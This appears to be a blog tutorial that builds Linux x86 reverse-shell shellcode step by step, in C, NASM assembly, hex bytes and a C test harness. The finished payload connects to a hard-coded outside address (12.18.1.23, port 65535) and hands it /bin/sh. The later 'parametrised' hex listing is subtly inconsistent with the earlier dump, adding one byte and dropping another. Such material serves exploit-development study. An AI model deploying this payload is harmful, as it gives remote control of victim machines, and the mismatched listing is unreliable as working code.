Goal
The goal of this ticket is to write a shellcode that makes a connection from the hacked system to a different system where it can be cached by different network tools like net cat
In order to complete this task I will try to follow the workflow that I presented in my previous tickets concerning shellcode writing (Introduction to Linux shellcode writing, part 1 and part 2) meaning that i will first write a C version, then I will try to translate the C version in assembler trying to avoid the common shellcode writing pitfalls like null bytes problem and the addressing problem.
This shellcode will also share most of his code with the shellcode from How to write a port-biding shellcode because it have a lot of functionalities and code in common.
1. The C version of the shellcode
The following listing represents a minimal version (no error checking is done) of a reverse connection program. Basically the program is doing the following actions:
- create a socket
- initialize a connection on socket to a specific address and port
- redirect the stdin, stdout and stderr to the socket
- execute “bin/sh”
#include <stdio.h>
#include <stdlib.h>
#include <netdb.h>
#include <netinet/in.h>
#include <string.h>
int main( int argc, char *argv[] ) {
int serverSocketFileDescriptor;
int clientSocketFileDescriptor;
int clilen;
struct sockaddr_in serv_addr;
struct sockaddr_in cli_addr;
/* First call to socket() function */
serverSocketFileDescriptor = socket(AF_INET, SOCK_STREAM, 0);
/* Initialize socket structure */
bzero((char *) &serv_addr, sizeof(serv_addr));
serv_addr.sin_family = AF_INET;
serv_addr.sin_addr.s_addr = 0x100007f;
serv_addr.sin_port = htons(65535);
/* Initialize a connection on a socket.*/
clientSocketFileDescriptor =
connect(serverSocketFileDescriptor, (struct sockaddr *) &serv_addr, sizeof(serv_addr));
/*Redirect to the new socket the sdtin,stdout,stderr*/
dup2(serverSocketFileDescriptor, 0);
dup2(serverSocketFileDescriptor, 1);
dup2(serverSocketFileDescriptor, 2);
/*execute /bin/sh */
execve("/bin/sh", NULL, NULL);
/* Close the sockets*/
close(clientSocketFileDescriptor);
close(serverSocketFileDescriptor);
}
2. The assembler version of the shellcode
2.1 Find the system call numbers of the functions used in the C version
The first step in order to write the assembler version is to find the system calls number for each of the calls used in the C version.
For all the socket operations there is only one system call, the number 102:
cat /usr/include/i386-linux-gnu/asm/unistd_32.h | grep socket #define __NR_socketcall 102
The sub calls numbers can be found in the file /usr/include/linux/net.h :
#define SYS_SOCKET 1 /* sys_socket(2) */ #define SYS_BIND 2 /* sys_bind(2) */ #define SYS_CONNECT 3 /* sys_connect(2) */ #define SYS_LISTEN 4 /* sys_listen(2) */ #define SYS_ACCEPT 5 /* sys_accept(2) */
For all the others calls (dup2, execve and close) the system call numbers are:
#define __NR_dup2 63 #define __NR_execve 11 #define __NR_close 6
The second step is to take a look to the man pages of each of the functions used to check the needed parameters for each of the functions.
2.2 Implement the assembler version for each of the functions from the C program
Once we have all the necessary informations for the functions used in the C version (the system call numbers and the parameters) the next step is to write the assembler version of the C program.
The assembler version of the shellcode is strongly inspired from the shellcode of How to write a port-biding shellcode, I just removed the functions that were not needed for the actual shell and added one missing function (the ConnectSocket function).
So, the working implementation have the following structure:
_start: call OpenSocket ... call ConnectSocket ... call Dup2OutInErr ... call ExecuteBinSh ... ret ret ret ret
The assembler implementation of the reverse-connection shellcode is the following one:
; Filename: SocketClient.nasm ; Author: [email protected] ; Website: itblog.adrian.citu.name global _start section .text OpenSocket: ;syscall socketcall xor eax,eax xor ebx, ebx mov al, 102 ; build the argument array on the stack push ebx ;protocol = 0 push 1 ; type = SOCK_STREAM (1) push 2 ;domain = PF_INET (2) mov ecx, esp ;pointer to argument array mov bl, 01 ;1 = SYS_SOCKET = socket() int 0x80 mov esi, eax call ConnectSocket ret ConnectSocket: ; syscall socketcall xor eax, eax xor ebx, ebx mov al, 102 ;build sockaddr struct on the stack push dword 0x1701120c;ADDRESS =12.18.1.23 push word 0xffff ; PORT = 65535 push word 2 ; AF_INET = 2 mov ecx, esp ; pointer to sockaddr struct mov bl, 3 ;3 = SYS_CONNECT = connect() push BYTE 16 ;sizeof(sockaddr struct) = 16 taken from the ;systrace SocketClient Cpp version push ecx ;sockaddr struct pointer push esi ;socket file descriptor mov ecx, esp ;pointer to argument array int 0x80 call Dup2OutInErr ret Dup2OutInErr: xor eax, eax xor ebx, ebx ;syscall dup2 mov al, 63 mov ebx, esi xor ecx, ecx ;duplicate stdin int 0x80 xor eax, eax xor ebx, ebx mov al, 63 ;syscall dup2 mov ebx, esi inc ecx ;duplicate stdout, ebx still holds the socket fd int 0x80 xor eax, eax xor ebx, ebx mov al, 63 ;syscall dup2 mov ebx, esi inc ecx inc ecx ;duplicate stdout, ebx still holds the socket fd int 0x80 call ExecuteBinSh ret ExecuteBinSh: xor eax, eax xor ebx, ebx xor ecx, ecx push eax ;null bytes push 0x68732f2f ;//sh push 0x6e69622f ;/bin mov ebx, esp ;load address of /bin/sh push eax ;set argument to 0x0 mov ecx, esp ;save the pointer to argument envp push eax ;set argument to 0x0 mov edx, esp ;save the pointer to argument ptr mov al, 11 ;syscall execve int 0x80 ret _start: call OpenSocket
3. Test the shellcode
To test the shelcode we will follow the procedure described in Introduction to Linux shellcode writing – Test your shellcode but basically we retrieve the HEX version of the shellcode (using the commandlinefu.com command) from the binary and then we added to shellcode.c program.
The HEX version of the shellcode is the following one:
"\x31\xc0\x31\xdb\xb0\x66\x53\x6a\x01\x6a\x02\x89\xe1\xb3\x01\xcd\x80 \x89\xc6\xe8\x01\x00\x00\x00\xc3\x31\xc0\x31\xdb\xb0\x66\x68\x0c\x12 \x01\x17\x66\x6a\xff\x66\x6a\x02\x89\xe1\xb3\x03\x6a\x10\x51\x56\x89 \xe1\xcd\x80\xe8\x01\x00\x00\x00\xc3\x31\xc0\x31\xdb\xb0\x3f\x89\xf3 \x31\xc9\xcd\x80\x31\xc0\x31\xdb\xb0\x3f\x89\xf3\x41\xcd\x80\x31\xc0 \x31\xdb\xb0\x3f\x89\xf3\x41\x41\xcd\x80\xe8\x01\x00\x00\x00\xc3\x31 \xc0\x31\xdb\x31\xc9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89 \xe3\x50\x89\xe1\x50\x89\xe2\xb0\x0b\xcd\x80\xc3\xe8\x78\xff\xff\xff"
3.1 Make the external IP address and port number as a parameter
In the actual code the external IP address and the port number are static (it’s the same for every execution). We would like to make these 2 things parametrisable . First we must find the HEX value of the instructions representing the IP address and the port number. Using the objdump with the following parameters:
objdump -d SocketClient -M intel | grep push
and we will find:
804807f: 68 0c 12 01 17 push 0x1701120c 8048084: 66 6a ff pushw 0xffff
So, in our binary representation of the shellcode we could make two constants representing the IP address and the port number:
#include<stdio.h>
#include<string.h>
#define PORT_NUMBER "\xff" // 0xffff
#define IP_ADDRESS "\x0c\x12\x01\x17"
unsigned char code[] =
"\x31\xc0\x31\xdb\xb0\x66\x53\x6a\x01\x6a\x02\x89\xe1\xb3\x01\xcd\x80"
"\x89\xc6\xe8\x01\x00\x00\x00\xc3\x31\xc0\x31\xdb\xb0\x66\x68\x6a"
IP_ADDRESS
"\x66"
PORT_NUMBER
"\x66\x6a\x02\x89\xe1\xb3\x03\x6a\x10\x51\x56\x89\xe1\xcd\x80\xe8\x01"
"\x00\x00\x00\xc3\x31\xc0\x31\xdb\xb0\x3f\x89\xf3\x31\xc9\xcd\x80\x31"
"\xc0\x31\xdb\xb0\x3f\x89\xf3\x41\xcd\x80\x31\xc0\x31\xdb\xb0\x3f\x89"
"\xf3\x41\x41\xcd\x80\xe8\x01\x00\x00\x00\xc3\x31\xc0\x31\xdb\x31\xc9"
"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe1\x50"
"\x89\xe2\xb0\x0b\xcd\x80\xc3\xe8\x78\xff\xff\xff";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
Last point about these two parameters(IP address and port number); these parameters are pushed on the stack in HEX version and due to the Little Endian architecture of the Intel processors the parameters should be pushed in reverse order. For example if you want to push decimal 12345 (0x3039), you should push 54321 (0x3930).
In order to compute these two parameters in a correct way, I crafted 2 small bash scripts: fromIpToBigEndianHex.sh and fromPortNumberToBigEndianHex.sh
All the source codes explained presented in this ticket can be found here: gitHub.
Adventures in the programming jungle 